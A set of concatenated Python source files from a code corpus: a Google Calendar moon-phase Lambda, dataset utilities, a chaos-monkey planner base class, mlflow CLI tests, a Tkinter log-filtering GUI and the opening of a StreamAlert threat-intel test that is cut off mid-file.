self._tk.delete("1.0", tk.END)
self._tk.insert(tk.END, value)
self._tk.mark_set("insert", index)
self._tk.see(index)
self._highlight()
def on_disposed(self):
self._tk.unbind('<KeyRelease>') | 2.484375 | 2 |
lambdas/create_event/main.py | Kruril/LunaV2 | 0 | 12786312 | import json
from datetime import datetime, timedelta
import requests
import os.path
import boto3
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from google.oauth2.credentials import Credentials
# If modifying these scopes, delete the file credentials.json.
SCOPES = ['https://www.googleapis.com/auth/calendar']
CREDENTIALS_FILE = 'credentials.json'
s3 = boto3.client("s3")
s3_bucket = os.environ["BUCKET"]
def create_event(event, context):
month = datetime.now().month
year = datetime.now().year
service = get_calendar_service()
phases = requests.get(f"https://www.icalendar37.net/lunar/api/?lang=fr&month={month}&year={year}").json()["phase"]
for day_number in phases:
phase = phases[day_number]["npWidget"]
day = datetime(year, month, int(day_number))
start = (day + timedelta(hours=18)).isoformat()
end = (day + timedelta(hours=18, minutes=30)).isoformat()
service.events().insert(calendarId='primary',
body={
"summary": phase,
"start": {"dateTime": start, "timeZone": 'Europe/Brussels'},
"end": {"dateTime": end, "timeZone": 'Europe/Brussels'},
}
).execute()
def get_calendar_service():
creds = None
obj = s3.get_object(Bucket=s3_bucket, Key=CREDENTIALS_FILE)
creds = Credentials.from_authorized_user_info(json.load(obj['Body']), SCOPES)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_config(
json.load(obj['Body']), SCOPES)
creds = flow.run_local_server(port=0)
# Save the credentials for the next run
s3.put_object(Bucket=s3_bucket, Key=CREDENTIALS_FILE, Body=creds.to_json())
service = build('calendar', 'v3', credentials=creds)
return service
if __name__ == '__main__':
create_event("salut", "coucou")
# Create credentials file
# service = get_calendar_service()
| 2.71875 | 3 |
utils/data_utils.py | kdmarshall/Two_Sigma_Financial_Modeling_Challenge | 3 | 12786313 | __doc__ = """
Various data utilities.
"""
####################################################################
# Packages
####################################################################
import os
import h5py
import numpy as np
import pandas as pd
####################################################################
# Globals/Constants
####################################################################
PROJECT_DIR = os.path.dirname(
os.path.dirname(
os.path.realpath(__file__)))
DATA_DIR = os.path.join(PROJECT_DIR, 'data')
TRAIN_DATA_FILE = os.path.join(DATA_DIR, 'train.h5')
####################################################################
# Functions
####################################################################
def get_data(path=None):
if path:
data_set = DataSet(path)
else:
data_set = DataSet(TRAIN_DATA_FILE)
return data_set
####################################################################
# Classes
####################################################################
class DataSet(object):
"""class for dataset processing"""
def __init__(self, path=TRAIN_DATA_FILE):
self.path = path
self.data_dict = self._get_data_dict()
self.df = self._get_df()
def _get_data_dict(self):
with h5py.File(self.path,'r') as hf:
train_hf = hf.get('train')
data_dict = { hf_key: np.array(train_hf.get(hf_key))
for hf_key in train_hf.keys()}
return data_dict
def _get_df(self):
with pd.HDFStore(self.path, "r") as train:
df = train.get("train")
return df
def __repr__(self):
sets = [ "{}: {}".format(key,data_set.shape)
for key, data_set in
self.data_dict.iteritems()]
return "; ".join(sets)
def keys(self):
return self.data_dict.keys()
def get(self, key):
return self.data_dict.get(key, None)
def to_df(self):
return self.df
def get_batch(self, slice_index, batch_size, columns=None, random=False):
if random:
samples = self.df.sample(n=batch_size)
else:
num_samples = self.df.shape[0]
if (slice_index+1)*batch_size >= num_samples:
print("Slice is out of range. Taking last batch_size slice")
sample_range = (num_samples - batch_size, num_samples)
else:
sample_range = (slice_index*batch_size, (slice_index+1)*batch_size)
samples = self.df[sample_range[0] : sample_range[1]]
samples_matrix = np.array(samples.as_matrix(columns=columns)) if columns else np.array(samples.as_matrix())
return samples_matrix
def get_numpy_data(self):
df = self.df
means = []
stds = []
# Assuming column order remains consistent throughout the class
for col in df.columns:
if col not in ['y', 'timestamp', 'index', 'id']:
data = df[col].dropna().as_matrix()
means.append(np.mean(data))
stds.append(np.std(data))
col_means = np.array(means)
col_stds = np.array(stds)
# Ensure values are sorted by time
df = df.sort_values(by=['id', 'timestamp'], ascending=True)
max_seq_len_raw = 1820
# Simply mean-fill missing values for now
df = df.fillna(df.mean())
ids = np.unique(df['id'].as_matrix())
examples = []
targets = []
weights = []
for id in ids:
slice = df[df.id == id]
num_timesteps = slice.shape[0]
#y = slice['y'].as_matrix()
# Pad df to max seq len
padded = slice.reset_index().reindex(range(max_seq_len_raw),
fill_value=0)
target = padded['y'].as_matrix()
padded.drop('y', axis=1, inplace=True)
padded.drop('timestamp', axis=1, inplace=True)
padded.drop('index', axis=1, inplace=True)
padded.drop('id', axis=1, inplace=True)
example = padded.as_matrix()
examples.append(example)
targets.append(target)
weight = [1]*num_timesteps + [0]*(max_seq_len_raw - num_timesteps)
weights.append(weight)
examples = np.array(examples)
targets = np.array(targets)
weights = np.array(weights)
# Normalize the data
examples = (examples - col_means)/col_stds
# TODO: Supply these outside the function later: col_means, col_stds
return examples, targets, weights
def split_valid(self, examples, targets, weights, valid_split_ratio=0.5):
"""
Args:
valid_split_ratio: float range 0-1.; percentage of data reserved
for validation. Note that two validation sets are reserved: unique
ids are reserved entirely for validation, and, latter timesteps for
sequences used in training are also used in validation.
"""
num_ids = examples.shape[0]
valid_num = int(round(num_ids*valid_split_ratio))
examples_train_pre = examples[:-valid_num]
targets_train_pre = targets[:-valid_num]
weights_train_pre = weights[:-valid_num]
examples_valid = examples[-valid_num:]
targets_valid = targets[-valid_num:]
weights_valid = weights[-valid_num:]
examples_train = []
targets_train = []
weights_train = []
examples_train_valid = []
targets_train_valid = []
weights_train_valid = []
valid_len = 300 # Hardcoded for now
for arr1, arr2, arr3 in zip(examples_train_pre, targets_train_pre,
weights_train_pre):
examples_train.append(arr1[:-valid_len])
targets_train.append(arr2[:-valid_len])
weights_train.append(arr3[:-valid_len])
examples_train_valid.append(arr1[-valid_len:])
targets_train_valid.append(arr2[-valid_len:])
weights_train_valid.append(arr3[-valid_len:])
trainset = (np.array(examples_train), np.array(targets_train),
np.array(weights_train))
train_validset = (np.array(examples_train_valid),
np.array(targets_train_valid),
np.array(weights_train_valid))
validset = (examples_valid, targets_valid, weights_valid)
return trainset, train_validset, validset
def get_numpy_batch(self, dataset, batch_size, seq_len):
examples = []
targets = []
weights = []
#for _ in range(batch_size):
while len(targets) < batch_size:
# Sample a random id
idx = np.random.choice(range(dataset[0].shape[0]))
# Take random slice
max_seq_len = dataset[0][idx].shape[0]
assert max_seq_len >= seq_len
slice = np.random.choice(range(max_seq_len - seq_len))
# Let's just go with full length for now
w = dataset[2][idx][slice:slice+seq_len]
if np.sum(w) != len(w):
continue
examples.append(dataset[0][idx][slice:slice+seq_len])
targets.append(dataset[1][idx][slice:slice+seq_len])
weights.append(w)
return np.array(examples), np.array(targets), np.array(weights)
| 2 | 2 |
chaosmonkey/planners/planner.py | BBVA/chaos-monkey-engine | 52 | 12786314 | <filename>chaosmonkey/planners/planner.py
"""
Base class for planners
Every planner must extend Planner class
"""
from chaosmonkey.engine.cme_manager import manager
class Planner:
"""
Planner interface
Planners are responsible for scheduling jobs that executes attacks
:param name: plan name
"""
ref = None # must override
schema = None # must override
example = None # must override
def __init__(self, name):
self.name = name
def plan(self, planner_config, attack_config):
"""
Plan the jobs.
This method should use the config to schedule jobs based on the
configuration for the planner
:param planner_config: configuration related to the scheduler
:param attack_config: configuration related to the attack
"""
raise NotImplementedError("Plans should implement this!")
@staticmethod
def add_plan(name):
return manager.add_plan(name)
@staticmethod
def _add_executor(date, name, attack_config, plan_id):
"""
Add a job to the global scheduler
:param date: date to execute the job
:param name: job name
:param attack_config: configuration related to the attack
"""
date_timezone = manager.scheduler.timezone.localize(date)
manager.add_executor(date_timezone, name, attack_config, plan_id)
@staticmethod
def to_dict():
raise NotImplementedError("Planners should implement this!")
@staticmethod
def _to_dict(ref, schema, example):
return {
"ref": ref,
"schema": schema,
"example": example,
}
| 3.09375 | 3 |
tests/test_runs.py | rbrown-kayak/mlflow | 0 | 12786315 | from click.testing import CliRunner
from unittest import mock
import numpy as np
import os
import pandas as pd
import shutil
import tempfile
import textwrap
from mlflow import experiments
from mlflow.runs import list_run
import mlflow
def test_list_run():
with mlflow.start_run(run_name="apple"):
pass
result = CliRunner().invoke(list_run, ["--experiment-id", "0"])
assert "apple" in result.output
def test_list_run_experiment_id_required():
result = CliRunner().invoke(list_run, [])
assert "Missing option '--experiment-id'" in result.output
def test_csv_generation():
with mock.patch("mlflow.experiments.fluent.search_runs") as mock_search_runs:
mock_search_runs.return_value = pd.DataFrame(
{
"run_id": np.array(["all_set", "with_none", "with_nan"]),
"experiment_id": np.array([1, 1, 1]),
"param_optimizer": np.array(["Adam", None, "Adam"]),
"avg_loss": np.array([42.0, None, np.nan], dtype=np.float32),
},
columns=["run_id", "experiment_id", "param_optimizer", "avg_loss"],
)
expected_csv = textwrap.dedent(
"""\
run_id,experiment_id,param_optimizer,avg_loss
all_set,1,Adam,42.0
with_none,1,,
with_nan,1,Adam,
"""
)
tempdir = tempfile.mkdtemp()
try:
result_filename = os.path.join(tempdir, "result.csv")
CliRunner().invoke(
experiments.generate_csv_with_runs,
["--experiment-id", "1", "--filename", result_filename],
)
with open(result_filename, "r") as fd:
assert expected_csv == fd.read()
finally:
shutil.rmtree(tempdir)
| 2.4375 | 2 |
logfilter/logfilter.py | iamFIREcracker/logfilter | 0 | 12786316 | <reponame>iamFIREcracker/logfilter
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import absolute_import
import os
import re
import time
import subprocess
import threading
from argparse import ArgumentParser
from collections import deque
from itertools import cycle
from itertools import takewhile
from logfilter import __version__
from ._compact import filedialog
from ._compact import filter
from ._compact import tkinter
from ._compact import queue
from ._compact import range
from .common import debug
from .common import Tag
from .common import BooleanVar
from .common import StringVar
from .ui import FilterBar
"""Number of lines to collect before telling the gui to refresh."""
_BATCH_LIMIT = 200
"""Default event listener."""
_NULL_LISTENER = lambda *a, **kw: None
"""Gui polling job interval"""
_POLL_INTERVAL = 66
"""Stop message used to stop threads."""
_STOP_MESSAGE = None
FOREGROUND = '#F8F8F2'
BACKGROUND = '#1B1D1E'
CURRENTLINEBACKGROUND = '#232728'
SELECTFOREGROUND = FOREGROUND
SELECTBACKGROUND = '#403D3D'
"""Tag color palette."""
_TAG_PALETTE = (
('red', '#E52222'),
('green', '#A6E32D'),
('yellow', '#FD951E'),
('blue', '#C48DFF'),
('magenta', '#FA2573'),
('cyan', '#67D9F0')
)
"""Application title template"""
_TITLE = 'logfilter: {filename}'
"""Default initial directory used by the file chooser widget"""
_INITIALDIR = os.path.expanduser('~')
"""Number of lines to display on screen."""
LINES_LIMIT = 8000
"""Special scroll limit value to use a kind of infinite scroll buffer."""
LINES_UNLIMITED = -1
"""Default sleep interval"""
SLEEP_INTERVAL = 1.0
"""Passthru filter."""
PASSTHRU_FILTER = '^'
"""End of file sentinel"""
EOF = object()
"""List of env variables to check while editing a file"""
EDITORS = 'LFEDITOR VISUAL EDITOR'.split(' ')
"""Sentinel to check wether selected line has been initialized or not"""
UNSELECTED = object()
class Gui(tkinter.Tk):
def __init__(self, parent, **kwargs):
tkinter.Tk.__init__(self, parent)
self._schedule_queue = queue.Queue()
self.on_quit_listener = (_NULL_LISTENER, (), {})
self.on_new_filter_listener = (_NULL_LISTENER, (), {})
self._initialize(**kwargs)
self._update()
def _initialize(self, font, filename, filters, scroll_limit):
"""
Initialize the layout of the GUI
"""
self.grid()
self.grid_columnconfigure(0, weight=1)
self.grid_rowconfigure(2, weight=1)
self.protocol('WM_DELETE_WINDOW', self.on_close)
# Container 0
self.file_chooser = FileChooser(self, filename=filename)
self.file_chooser.grid(row=0, column=0, sticky='EW')
self.file_chooser.register_listener('press_enter', self.on_press_enter)
# Container1
container1 = tkinter.Frame(self)
container1.grid(row=1, column=0, sticky='EW')
container15 = tkinter.Frame(container1)
container15.grid(row=0, column=0, sticky='EW')
self.filter_bar = FilterBar(container15, filter_values=filters)
self.filter_bar.grid(row=0, column=0, sticky='EW')
self.filter_bar.bind('<<FiltersReady>>', self.on_press_enter_event)
button = tkinter.Button(
container1, text="Filter", command=self.on_press_enter)
button.grid(row=0, column=len(filters) + 1, sticky='EW')
# Container2
self.text = Text(
self, foreground=FOREGROUND, background=BACKGROUND,
selectforeground=SELECTFOREGROUND,
selectbackground=SELECTBACKGROUND,
inactiveselectbackground=SELECTBACKGROUND,
font=font, wrap=tkinter.NONE)
self.text.grid(row=2, column=0, sticky='NSEW')
self.text.bind('<<PassthruSwitch>>', self.on_press_enter_event) # XXX why the hell can't use register_listener here???
self.text.configure_scroll_limit(scroll_limit)
self.text.set_filename(filename)
def _update(self):
"""
Poll the schedule queue for new actions.
"""
for i in range(10):
try:
(func, args, kwargs) = self._schedule_queue.get(False)
#print '- schedule_queue', self._schedule_queue.qsize()
except queue.Empty:
break
self.after_idle(func, *args, **kwargs)
self.after(_POLL_INTERVAL, self._update)
@debug
def on_close(self):
(func, args, kwargs) = self.on_quit_listener
func(*args, **kwargs)
self.quit()
@debug
def on_quit(self, event):
self.on_close()
@debug
def on_press_enter(self):
filename = self.file_chooser.get_filename()
passthru = self.text.get_passthru()
self.title(_TITLE.format(filename=filename))
filter_strings = self.filter_bar.get_filter_values()
# When the passthru switch is enabled notify workers the sole
# catch-all filter in order to simplify processing
queue_filter_strings = [PASSTHRU_FILTER] if passthru \
else filter_strings
self.text.set_filename(filename)
self.text.configure_tags(
Tag(n, f, {'foreground': c})
for ((n, c), f) in zip(cycle(_TAG_PALETTE), filter_strings))
(func, args, kwargs) = self.on_new_filter_listener
args = [filename, queue_filter_strings] + list(args)
func(*args, **kwargs)
@debug
def on_press_enter_event(self, event):
self.on_press_enter()
def raise_(self):
"""
Raise the window on the top of windows stack.
The method is supposed to be invoked by the gui thread, hence it should
be used in pair with `schedule`.
"""
#self.attributes('-topmost', True)
#self.attributes('-topmost', False)
self.lift()
self.focus_force()
def register_listener(self, event, func, *args, **kwargs):
"""
Register a listener for the specified named event.
@param func function to schedule
@param args positional arguments for the fuction
@param kwargs named arguments for the function
"""
if event not in ['quit', 'new_filter']:
raise ValueError("Invalid event name: " + event)
if event == 'quit':
self.on_quit_listener = (func, args, kwargs)
elif event == 'new_filter':
self.on_new_filter_listener = (func, args, kwargs)
def schedule(self, func, *args, **kwargs):
"""
Ask the event loop to schedule given function with arguments
@param func function to schedule
@param args positional arguments for the fuction
@param kwargs named arguments for the function
"""
self._schedule_queue.put((func, args, kwargs))
def clear_text(self):
"""
Delete all the text contained in the text area.
The method schedule the action to the giu thread, hence it is to be
considered thread-safe.
"""
def wrapped():
self.text.clear()
self.schedule(wrapped)
def append_text(self, lines):
"""
Append input lines into the text area and scroll to the bottom.
Additionally, raise the window on top of windows stack.
The method schedule the action to the giu thread, hence it is to be
considered thread-safe.
@param lines iterable containing the lines to be added.
"""
def wrapped():
self.text.append(lines)
if self.text.raise_on_output:
self.raise_()
self.schedule(wrapped)
class FileChooser(tkinter.Frame):
"""
Widget used to select a file from the file-system.
"""
def __init__(self, parent, **kwargs):
tkinter.Frame.__init__(self, parent)
self.on_press_enter_listener = (_NULL_LISTENER, (), {})
self._initialize(**kwargs)
def _initialize(self, filename):
"""
Initialize the file chooser widget.
"""
self.grid_columnconfigure(0, weight=1)
self.filename = StringVar(filename)
entry = tkinter.Entry(self, textvariable=self.filename)
entry.bind("<Return>", self.on_press_enter_event)
entry.grid(row=0, column=0, sticky='EW')
button = tkinter.Button(
self, text="Select file", command=self.on_button_click)
button.grid(row=0, column=1)
@debug
def on_press_enter(self):
(func, args, kwargs) = self.on_press_enter_listener
func(*args, **kwargs)
@debug
def on_press_enter_event(self, event):
self.on_press_enter()
@debug
def on_button_click(self):
"""
Open a filechooser dialog and set the internal filename.
"""
prev = self.filename.get()
initialdir = os.path.dirname(prev) if prev else _INITIALDIR
filename = filedialog.askopenfilename(
parent=self, initialdir=initialdir, title='Choose a file')
if filename:
self.filename.set(filename)
def get_filename(self):
"""
Return the content of the filename entry.
@return the filename entry content.
"""
return self.filename.get()
def register_listener(self, event, func, *args, **kwargs):
"""
Register a listener for the specified named event.
@param func function to schedule
@param args positional arguments for the fuction
@param kwargs named arguments for the function
"""
if event not in ['press_enter']:
raise ValueError("Invalid event name: " + event)
if event == 'press_enter':
self.on_press_enter_listener = (func, args, kwargs)
class Text(tkinter.Frame):
"""
Extension of the `Tk.Text` widget which add support to colored strings.
The main goal of the widget is to extend the `#insert` method to add support
for string coloring, depending on an input tags.
"""
def __init__(self, parent, **kwargs):
tkinter.Frame.__init__(self, parent)
self._scroll_limit = LINES_LIMIT
self._scroll_on_output = BooleanVar(True)
self._raise_on_output = BooleanVar(True)
self._greedy_coloring = BooleanVar(False)
def _on_passthru_change(*args, **kwargs):
self.event_generate('<<PassthruSwitch>>')
self._passthru = BooleanVar(False, _on_passthru_change)
self._lines = 0
self._line_numbers = deque()
self._filename = ''
self._current_line = UNSELECTED
self._tags = []
self._initialize(**kwargs)
def _popuplabel(self, text):
"""
Create a label to be displayed in the popup menu.
"""
return text.ljust(20)
def _initialize(self, **kwargs):
"""
Initialize the text widget.
"""
text = tkinter.Text(self, **kwargs)
vert_scroll = tkinter.Scrollbar(self)
horiz_scroll = tkinter.Scrollbar(self, orient=tkinter.HORIZONTAL)
popup = tkinter.Menu(self, tearoff=0)
self.grid_rowconfigure(0, weight=1)
self.grid_columnconfigure(0, weight=1)
popup.add_command(label=self._popuplabel('Edit'), command=self.edit)
popup.add_command(label=self._popuplabel('Clear'), command=self.clear)
popup.add_separator()
popup.add_checkbutton(
label=self._popuplabel('Greedy coloring'),
onvalue=True, offvalue=False, variable=self._greedy_coloring)
popup.add_checkbutton(
label=self._popuplabel('Passthru'),
onvalue=True, offvalue=False, variable=self._passthru)
popup.add_separator()
popup.add_checkbutton(
label=self._popuplabel('Auto scroll'),
onvalue=True, offvalue=False, variable=self._scroll_on_output)
popup.add_checkbutton(
label=self._popuplabel('Auto raise'),
onvalue=True, offvalue=False, variable=self._raise_on_output)
text.tag_config('currentline', background=CURRENTLINEBACKGROUND)
text.tag_config('selection', background=SELECTBACKGROUND)
text.grid(row=0, column=0, sticky='NSEW')
text.config(yscrollcommand=vert_scroll.set)
text.config(xscrollcommand=horiz_scroll.set)
text.config(state=tkinter.DISABLED)
text.bind("<Button-1>", self._highlight_current_line)
text.bind("<Button-3>", self._show_popup)
text.bind("<<Selection>>", self._on_selection_change)
vert_scroll.grid(row=0, column=1, sticky='NS')
vert_scroll.config(command=text.yview)
horiz_scroll.grid(row=1, column=0, sticky='EW')
horiz_scroll.config(command=text.xview)
self.text = text
self.popup = popup
def _clear_selection(self):
try:
self.text.tag_remove("sel", "sel.first", "sel.last")
except tkinter.TclError:
pass
def _clear_current_line(self):
if self._current_line is not UNSELECTED:
line_end = self.text.index("{0} + 1 lines".format(self._current_line))
self.text.tag_remove("currentline", self._current_line, line_end)
self._current_line = UNSELECTED
def _extract_row(self, rowcol):
"""
Given a tkinter position information (i.e. 10.2, where 10 is the row
number, and 2 is the column one), extract the information of the row
"""
return int(float(rowcol))
def _highlight_current_line(self, event):
# Clear old current line
self._clear_current_line()
# .. and highlight the new line
newline = self.text.index(
"@{0},{1} linestart".format(event.x, event.y))
if self._extract_row(newline) <= self._lines:
self._current_line = newline
line_end = self.text.index("{0} + 1 lines".format(self._current_line))
self.text.tag_add("currentline", self._current_line, line_end)
# Finally, hide the menu
self.popup.unpost()
def _on_selection_change(self, event):
try:
if self.text.get("sel.first", "sel.last"):
self._clear_current_line();
except tkinter.TclError:
pass
def _show_popup(self, event):
self._clear_selection()
self._highlight_current_line(event)
self.popup.post(event.x_root, event.y_root)
def configure_scroll_limit(self, scroll_limit):
"""
Chache the widget scroll limit.
@param limit new scroll limit.
"""
self._scroll_limit = scroll_limit
def set_filename(self, filename):
"""
Set the name of the file from which we will receive updates.
@param filename filename
"""
self._filename = filename
def configure_tags(self, tags):
"""
Configure text tags.
@param tags collection of `Tag` items
"""
self._tags = list(tags)
[self.text.tag_config(t.name, t.settings) for t in self._tags]
def clear(self):
"""
Clear the text widget.
"""
self.text.config(state=tkinter.NORMAL)
self.text.delete(1.0, tkinter.END)
self.text.config(state=tkinter.DISABLED)
self._lines = 0
self._line_numbers = deque()
def get_passthru(self):
"""
Return the value of the passthru switch
@return the value of the passthru switch.
"""
return self._passthru.get()
def _get_editor(self):
"""
Return the editor to use to open the current file.
The function will look for environment variables in the given order:
LFEDITOR, VISUAL and finally EDITOR
"""
for name in EDITORS:
if name in os.environ:
return os.environ[name]
def _get_file_line_number(self):
"""
Get the file row associated with the mouse event.
"""
index = self._extract_row(self._current_line) - 1
if index >= len(self._line_numbers):
if self._line_numbers:
return str(self._line_numbers[-1])
else:
return str(1)
else:
# Deques are not optimized for random access, but given that
# edit operations are not so frequent we can just tolerate this
# inefficiency
return str(self._line_numbers[index])
def edit(self):
"""
Open the current file inside your preferred editor.
"""
cmd = self._get_editor()
cmd = cmd.replace('FILE', self._filename)
cmd = cmd.replace('ROW', self._get_file_line_number())
subprocess.Popen(cmd, shell=True)
def append(self, lines):
"""
Append given lines to the text widget and try to color them.
@param lines lines to add
"""
def highlight_tag(tag):
"""
Helper function simply used to adapt function signatures.
"""
self._highlight_pattern(start, end, tag.pattern, tag.name)
self.text.config(state=tkinter.NORMAL)
for (i, line) in lines:
start = self.text.index('{0} - 1 lines'.format(tkinter.END))
end = self.text.index(tkinter.END)
self.text.insert(tkinter.END, line)
[highlight_tag(t) for t in list(self._tags)]
self._lines += 1
self._line_numbers.append(i)
if (self._scroll_limit != LINES_UNLIMITED
and self._lines > self._scroll_limit):
# delete from row 1, column 0, to row 2, column 0 (first line)
self.text.delete(1.0, 2.0)
self._lines -= 1
self._line_numbers.popleft()
if self._current_line is not UNSELECTED:
self._current_line = self.text.index(
"{0} - 1 lines".format(self._current_line))
self.text.config(state=tkinter.DISABLED)
# Scroll to the bottom
if self._scroll_on_output.get():
self.text.yview(tkinter.MOVETO, 1.0)
def _highlight_pattern(self, start, end, pattern, tag_name):
"""
Highlight the input pattern with the settings associated with the tag.
Given a tag and a patter, the function will match only the first
occurrence of the patter.
@param start start search index
@param stop stop search index
@param pattern string pattern matching the tag
@param tag_name name of the tag to associate with matching strings
"""
while True:
count = tkinter.IntVar()
index = self.text.search(pattern, start, end, count=count, regexp=True)
if not index:
return
match_end = '{0}+{1}c'.format(index, count.get())
self.text.tag_add(tag_name, index, match_end)
start = match_end
if not self._greedy_coloring.get():
return
@property
def raise_on_output(self):
return self._raise_on_output.get()
@debug
def filter_thread_spawner_body(lines, interval, filter_queue,
lines_queue):
"""
Spawn a file filter thread as soon as a filter is read from the queue.
@param lines line used to skip stale lines
@param interval polling interval
@param filter_queue message queue containing the filter to apply
@param lines_queue message queue containing the lines to pass to the gui
"""
stop = None
worker = None
while True:
item = filter_queue.get()
if worker is not None:
stop.set()
worker.join()
if item == _STOP_MESSAGE:
break
(filename, filters) = item
stop = threading.Event()
worker = threading.Thread(
target=file_observer_body,
args=(filename, lines, interval, filters, lines_queue, stop))
worker.start()
def last(lines, iterable):
"""
Yield last `lines` lines, extracted from `iterable`.
Flush the buffer of lines if an empty string is received (EOF). When this
happens, the function will return all the new lines generated.
@param lines number of lines to buffer (if equal to LINES_UNLIMITED, then
all the lines will be buffered)
@param iterable iterable containing lines to be processed.
"""
def noteof(aggregate):
(i, line) = aggregate
return line is not EOF
lines = lines if lines != LINES_UNLIMITED else None
# Fill the buffer of lines, untill an EOF is received
for line in deque(takewhile(noteof, iterable), maxlen=lines):
yield line
yield next(iterable)
# Now return each item produced by the iterable
for line in iterable:
yield line
def lineenumerate(iterable):
"""
Return a generator which prepend a line number in front of each line
extracted from the given iterable.
The function properly takes into account EOF messages by yielding them
without increase the line number.
"""
i = 1
for line in iterable:
yield (i, line)
if line is not EOF:
i += 1
def tail_f(filename):
"""
Emulate the behaviour of `tail -f`.
Keep reading from the end of the file, and yield lines as soon as they are
added to the file. The function yields an empty string when the EOF is
reached: this let the caller wait a small amount of time before trying to
read new data.
@param filename name of the file to observe
"""
with open(filename) as f:
while True:
for line in f:
yield line
yield EOF
# Kind of rewind
where = f.tell()
f.seek(where)
def grep_e(*exps):
"""
Emulate the behaviour of `grep -e PATTERN [-e PATTERN ...]`.
Return a function which will try to match an input string against the set
of loaded regular expressions.
@param exps list of regular expressions
"""
regexps = [re.compile(exp) for exp in exps]
def wrapper(aggregate):
"""
Match input string with the set of preloaded regular expressions.
If an empty string, that will be interpreted as EOF and then a fake
match will be generated (to wake up possibly blocked callers).
@param line string to check for regular expressions matches.
@return True
"""
(i, line) = aggregate
return line == EOF or any([reg.search(line) for reg in regexps])
return wrapper
@debug
def file_observer_body(filename, lines, interval, filters, lines_queue, stop):
"""
Body function of thread waiting for file content changes.
The thread will poll `filename` every `iterval` seconds looking for new
lines; as soon as new lines are read from the file, these are filtered
depeding on `filters`, and the ones matching given criteria are put into the
synchronized `lines_queue`.
@param filename filename to poll
@param lines limit the number of lines produced by calling `tail_f`
@param interval polling interval
@param filters iterable of regexp filters to apply to the file content
@param lines_queue synchronized queue containing lines matching criteria
@param stop `threading.Event` object, used to stop the thread.
"""
line_buffer = []
for (i, line) in filter(grep_e(*filters), last(lines, lineenumerate(tail_f(filename)))):
if stop.isSet():
break
if (line is EOF and line_buffer) or (len(line_buffer) == _BATCH_LIMIT):
lines_queue.put(line_buffer)
#print '+', len(line_buffer), 'qsize', lines_queue.qsize()
line_buffer = []
if line is EOF:
# We reched the EOF, hence wait for new content
time.sleep(interval)
continue
line_buffer.append((i, line))
def gui_updater_body(gui, lines_queue):
"""
Body function of the thread in charge of update the gui text area.
@param gui `Gui` object to update.
@param lines_queue message queue containing lines used to update the gui.
"""
while True:
lines = lines_queue.get()
#print '-', lines_queue.qsize()
if lines == _STOP_MESSAGE:
break
gui.append_text(lines)
@debug
def quit(filter_queue, lines_queue):
"""
Invoked by the GUI when the main window has been closed.
"""
filter_queue.put(_STOP_MESSAGE)
lines_queue.put(_STOP_MESSAGE)
@debug
def apply_filters(filename, filters, gui, filter_queue):
"""
Invoked by the GUI when a new filter is entered.
Clear the gui and queue the received filter into the shared synchronized
queue.
@param filename the name of the file to analyze
@param gui `Gui` object to update.
@param filters collection of string filters
@param filter_queue message queue shared with working thread.
"""
gui.clear_text()
filter_queue.put((filename, filter(None, filters)))
def _build_parser():
"""
Return a command-line arguments parser.
"""
parser = ArgumentParser(
description='Filter the content of a file, dynamically')
parser.add_argument(
'filename', default='', nargs='?', help='Filename to filter.',
metavar='FILENAME')
parser.add_argument(
'-s', '--sleep-interval', dest='interval', default=SLEEP_INTERVAL,
type=float, help='Sleep SLEEP_INTERVAL seconds between iterations',
metavar='SLEEP_INTERVAL')
parser.add_argument(
'-l', '--limit', dest='limit', default=LINES_LIMIT, type=int,
help='Number of lines to display in the text area', metavar='LIMIT')
parser.add_argument(
'-e', '--regexp', dest='filters', action='append',
help='Filter presets', metavar='FILTERS')
parser.add_argument(
'--font', dest='font', help='Font used by the application')
parser.add_argument(
'--version', action='version',
version='%(prog)s {0}'.format(__version__),
help='print the application version and quit')
return parser
def _main():
parser = _build_parser()
args = parser.parse_args()
# create the array of filters
filters = args.filters if args.filters else []
# create communication queues, shared between threads
filter_queue = queue.Queue()
lines_queue = queue.Queue()
gui = Gui(
None, font=args.font, filename=args.filename, filters=filters,
scroll_limit=args.limit)
gui.register_listener('quit', quit, filter_queue, lines_queue)
gui.register_listener('new_filter', apply_filters, gui, filter_queue)
if args.filename and args.filters:
gui.on_press_enter()
filter_thread_spawner = threading.Thread(
target=filter_thread_spawner_body,
args=(args.limit, args.interval, filter_queue, lines_queue))
filter_thread_spawner.start()
gui_updater = threading.Thread(
target=gui_updater_body, args=(gui, lines_queue))
gui_updater.start()
gui.mainloop()
if __name__ == '__main__':
_main()
| 2.140625 | 2 |
tests/unit/stream_alert_rule_processor/test_threat_intel.py | ashmere/streamalert | 1 | 12786317 | <filename>tests/unit/stream_alert_rule_processor/test_threat_intel.py
"""
Copyright 2017-present, Airbnb Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# pylint: disable=protected-access,no-self-use
from nose.tools import (
assert_list_equal,
assert_equal,
assert_is_instance,
assert_items_equal
)
from stream_alert.rule_processor.threat_intel import StreamThreatIntel
class TestStreamStreamThreatIntel(object):
"""Test class for StreamThreatIntel"""
def setup(self):
"""Setup before each method"""
# Clear out the cached matchers and rules to avoid conflicts with production code
StreamThreatIntel._StreamThreatIntel__intelligence.clear() # pylint: disable=no-member
StreamThreatIntel._StreamThreatIntel__config.clear() # pylint: disable=no-member
def test_read_compressed_files(self):
"""Theat Intel - Read compressed csv.gz files into a dictionary"""
intelligence = StreamThreatIntel.read_compressed_files('tests/unit/fixtures')
assert_is_instance(intelligence, dict)
assert_list_equal(sorted(intelligence.keys()),
sorted(['domain', 'md5', 'ip']))
assert_equal(len(intelligence['domain']), 10)
assert_equal(len(intelligence['md5']), 10)
assert_equal(len(intelligence['ip']), 10)
def test_read_compressed_files_not_exist(self):
"""Threat Intel - Location of intelligence files not exist"""
# self.threat_intel = ti.StreamThreatIntel('not/exist/dir')
intelligence = StreamThreatIntel.read_compressed_files('not/exist/dir')
assert_equal(intelligence, None)
def test_load_intelligence(self):
"""Threat Intel - Load intelligence to memory"""
test_config = {
'threat_intel': {
